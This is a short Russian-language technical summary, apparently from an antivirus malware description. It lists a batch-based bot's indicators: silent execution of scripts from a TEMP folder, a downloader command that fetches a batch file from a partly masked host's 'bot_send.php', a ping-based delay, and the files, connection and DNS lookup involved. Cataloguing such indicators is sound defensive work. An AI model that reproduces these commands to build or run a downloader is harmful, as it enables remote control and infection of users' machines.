Техническая информация
- %TEMP%\AdbscVhhschx32\NaSC.exe /NOCONSOLE /SILENT /WAIT "Adobsfwush.bat"
- %TEMP%\AdbscVhhschx32\Adobsfwush.bat
- %TEMP%\AdbscVhhschx32\NaSC.exe /NOCONSOLE /SILENT /WAIT "Client.bat"
- %TEMP%\AdbscVhhschx32\jqtS.exe -O Adobsfwush.bat "http://jo##ua.com/bot_send.php?bo########################################"
- %TEMP%\AdbscVhhschx32\Adobsfwush.bat (загружен из сети Интернет)
- <SYSTEM32>\ping.exe 127.0.0.1 -n 15
- <SYSTEM32>\cmd.exe /c Client.bat
- %TEMP%\AdbscVhhschx32\url.bat
- %TEMP%\AdbscVhhschx32\bot.bat
- %TEMP%\AdbscVhhschx32\Adobsfwush.bat
- %TEMP%\AdbscVhhschx32\screen.bat
- %TEMP%\AdbscVhhschx32\client.bat
- %TEMP%\AdbscVhhschx32\jqtS.exe
- %TEMP%\AdbscVhhschx32\NaScVc.exe
- %TEMP%\AdbscVhhschx32\client.exe
- %TEMP%\AdbscVhhschx32\NaSC.exe
- %TEMP%\AdbscVhhschx32\Adobsfwush.bat
- 'jo##ua.com':80
- jo##ua.com/bot_send.php?bo########################################
- DNS ASK jo##ua.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''